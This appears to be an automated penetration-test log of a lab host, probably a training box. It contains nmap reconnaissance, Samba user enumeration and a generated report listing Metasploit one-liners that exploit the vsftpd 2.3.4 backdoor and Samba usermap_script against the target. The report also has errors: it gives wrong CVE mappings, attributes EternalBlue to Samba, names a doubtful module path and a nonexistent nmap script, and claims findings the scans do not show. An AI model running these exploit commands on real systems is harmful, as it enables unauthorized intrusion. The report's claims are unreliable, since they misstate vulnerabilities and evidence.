PENTEST LOG — 10.129.10.90
Date: 2026-06-05T10:44:29.783401
============================================================

[Step 1] Full TCP SYN scan (all 65535 ports)
  Cmd: nmap -Pn -sS -p- --min-rate 1000 --max-retries 2 10.129.10.90
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:44 +0200
Nmap scan report for 10.129.10.90
Host is up (0.042s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 110.64 seconds

----------------------------------------
[Step 2] Version + OS detection on 21,22,139,445,3632
  Cmd: nmap -Pn -sV -O --version-intensity 5 -sC --script-timeout 60s -p 21,22,139,445,3632 -oX /home/marina/Desktop/pentestM/RAG/outputs/nmap_sV_10_129_10_90.xml 10.129.10.90
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:47 +0200
Nmap scan report for 10.129.10.90
Host is up (0.041s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.125
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|remote management|webcam|printer
Running (JUST GUESSING): Linux 2.6.X|2.4.X (92%), Belkin embedded (90%), Control4 embedded (90%), Mobotix embedded (90%), Dell embedded (90%), Linksys embedded (90%), Tranzeo embedded (90%), Xerox embedded (90%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:belkin:n300 cpe:/o:linux:linux_kernel:2.6.30 cpe:/h:dell:remote_access_card:5 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller or Mobotix M22 camera (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Lin
----------------------------------------
[Step 3] Check for vsftpd backdoor and anonymous access
  Cmd: nmap -Pn -sV --script ftp-vsftpd-backdoor,ftp-anon -p 21 10.129.10.90 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:49 +0200
Nmap scan report for 10.129.10.90
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.97 seconds

----------------------------------------
[Step 4] Check SSH authentication methods
  Cmd: nmap -Pn -sV --script ssh-auth-methods -p 22 10.129.10.90 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:49 +0200
Nmap scan report for 10.129.10.90
Host is up (0.055s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.23 seconds

----------------------------------------
[Step 5] Check Samba for vulnerabilities and misconfigurations
  Cmd: nmap -Pn -sV --script smb-vuln-ms17-010,smb-enum-users -p 139 10.129.10.90 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:50 +0200
Nmap scan report for 10.129.10.90
Host is up (0.042s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Host script results:
| smb-enum-users: 
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   LAME\bind (RID: 1210)
|     Flags:       Account disabled, Normal user account
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Account disabled, Normal user account
|   LAME\dhcp (RID: 1202)
|     Flags:       Account disabled, Normal user account
|   LAME\distccd (RID: 1222)
|     Flags:       Account disabled, Normal user account
|   LAME\ftp (RID: 1214)
|     Flags:       Account disabled, Normal user account
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Account disabled, Normal user account
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Account disabled, Normal user account
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Account disabled, Normal user account
|   LAME\klog (RID: 1206)
|     Flags:       Account disabled, Normal user account
|   LAME\libuuid (RID: 1200)
|     Flags:       Account disabled, Normal user account
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Account disabled, Normal user account
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Account disabled, Normal user account
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Account disabled, Normal user account
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Account disabled, Normal user account
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   
----------------------------------------
[Step 6] Check Samba for vulnerabilities and misconfigurations
  Cmd: nmap -Pn -sV --script smb-vuln-ms17-010,smb-enum-users -p 445 10.129.10.90 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:51 +0200
Nmap scan report for 10.129.10.90
Host is up (0.045s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Host script results:
| smb-enum-users: 
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   LAME\bind (RID: 1210)
|     Flags:       Account disabled, Normal user account
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Account disabled, Normal user account
|   LAME\dhcp (RID: 1202)
|     Flags:       Account disabled, Normal user account
|   LAME\distccd (RID: 1222)
|     Flags:       Account disabled, Normal user account
|   LAME\ftp (RID: 1214)
|     Flags:       Account disabled, Normal user account
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Account disabled, Normal user account
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Account disabled, Normal user account
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Account disabled, Normal user account
|   LAME\klog (RID: 1206)
|     Flags:       Account disabled, Normal user account
|   LAME\libuuid (RID: 1200)
|     Flags:       Account disabled, Normal user account
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Account disabled, Normal user account
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Account disabled, Normal user account
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Account disabled, Normal user account
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Account disabled, Normal user account
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   
----------------------------------------
[Step 7] ACK scan — firewall detection
  Cmd: nmap -Pn -sA -p 21,22,139,445,3632 10.129.10.90
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:52 +0200
Nmap scan report for 10.129.10.90
Host is up (0.049s latency).

PORT     STATE      SERVICE
21/tcp   unfiltered ftp
22/tcp   unfiltered ssh
139/tcp  unfiltered netbios-ssn
445/tcp  unfiltered microsoft-ds
3632/tcp unfiltered distccd

Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds

----------------------------------------
[Step 8] UDP scan — top 100 ports by frequency
  Cmd: nmap -Pn -sU --top-ports 100 --open --max-retries 1 10.129.10.90
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:52 +0200
Nmap scan report for 10.129.10.90
Host is up (0.042s latency).
All 100 scanned ports on 10.129.10.90 are in ignored states.
Not shown: 98 open|filtered udp ports (no-response), 2 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds

----------------------------------------
[Step 9] UDP scan — exploit-focused service ports
  Cmd: nmap -Pn -sU -p 53,67,69,111,123,137,138,161,162,500,623,1434,1900,4500,5353,11211,17185 --open --max-retries 1 10.129.10.90
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:52 +0200
Nmap scan report for 10.129.10.90
Host is up.

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
69/udp    open|filtered tftp
111/udp   open|filtered rpcbind
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
500/udp   open|filtered isakmp
623/udp   open|filtered asf-rmcp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
5353/udp  open|filtered zeroconf
11211/udp open|filtered memcache
17185/udp open|filtered wdbrpc

Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds

----------------------------------------
[Step 10] MSF exploitation phase
  Cmd: msfconsole (multiple modules)
  OK: True
  Out:
5 modules executed
----------------------------------------
[Step 10] Searchsploit + credential phase
  Cmd: searchsploit / paramiko / ftplib
  OK: True
  Out:
2 exploits tried, 0 shells, 1 creds
----------------------------------------

============================================================
EXECUTIVE REPORT:
## Attack Surface Summary  
The attack surface is **HIGH** due to the presence of known vulnerabilities and misconfigurations. Specifically, the vsftpd 2.3.4 service on port 21 is known to have a backdoor vulnerability (CVE-2011-2523), and the Samba service (ports 139 and 445) is running an outdated version (3.0.20-Debian) that may be vulnerable to exploits such as EternalBlue (CVE-2017-0144) if not properly patched. Additionally, anonymous access is allowed for FTP and SMB, and SMB message signing is disabled, increasing the risk of relay attacks.

---

## Detected Services and Versions  
- **TCP 21**: vsftpd 2.3.4  
- **TCP 22**: OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)  
- **TCP 139**: Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  
- **TCP 445**: Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  
- **TCP 3632**: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  

---

## Key Findings  
- **Anonymous FTP login allowed** (port 21) — allows unauthenticated file enumeration.  
- **vsftpd 2.3.4** is known to have a backdoor vulnerability (CVE-2011-2523).  
- **Samba service** (ports 139 and 445) is running version 3.0.20-Debian, which is vulnerable to known exploits if not properly patched.  
- **SMB message signing is disabled** — increases risk of relay attacks.  
- **Multiple user accounts** listed in Samba configuration, including'msfadmin', 'root', and 'postgres', which could be targets for enumeration or exploitation if misconfigured.  
- **SSH allows both password and publickey authentication** — could be a target for brute-force or key-based attacks if not properly secured.  

---

## Recommended Next Steps  
1. **Exploit vsftpd 2.3.4 backdoor (CRITICAL):**  
   - Use Metasploit module: `exploit/unix/ftp/vsftpd_234_backdoor`  
   - Command: `msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 10.129.10.90; exploit"`  
   - CVE ID: [CVE-2011-2523](https://cve.mitre.org/cgi-bin/cvekey.cgi?name=CVE-2011-2523)  

2. **Check for SMB vulnerabilities (MEDIUM):**  
   - Use Metasploit module: `exploit/multi/samba/usermap_script` (for Samba versions 3.0.20-3.0.25)  
   - Command: `msfconsole -x "use exploit/multi/samba/usermap_script; set RHOSTS 10.129.10.90; exploit"`  
   - CVE ID: [CVE-2017-0144](https://cve.mitre.org/cgi-bin/cvekey.cgi?name=CVE-2017-0144)  

3. **Enumerate Samba users (MEDIUM):**  
   - Use Nmap script: `nmap --script smb-enum-users -p 139,445 10.129.10.90`  

4. **Verify if anonymous SMB access is allowed (MEDIUM):**  
   - Use Nmap script: `nmap --script smb-anon-enum -p 139,445 10.129.10.90`  

5. **Check for SSH brute-force or misconfigurations (MEDIUM):**  
   - Use Metasploit module: `auxiliary/scanner/ssh/ssh_enumusers`  
   - Command: `msfconsole -x "use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 10.129.10.90; exploit"`  

6. **Verify distccd service (Not determined):**  
   - Check for known vulnerabilities in distccd v1.4.2.4 (Ubuntu 4.2.4-1ubuntu4) using CVE databases.  
   - If vulnerable, use Metasploit module: `exploit/unix/ftp/distcc_exec` (if applicable).
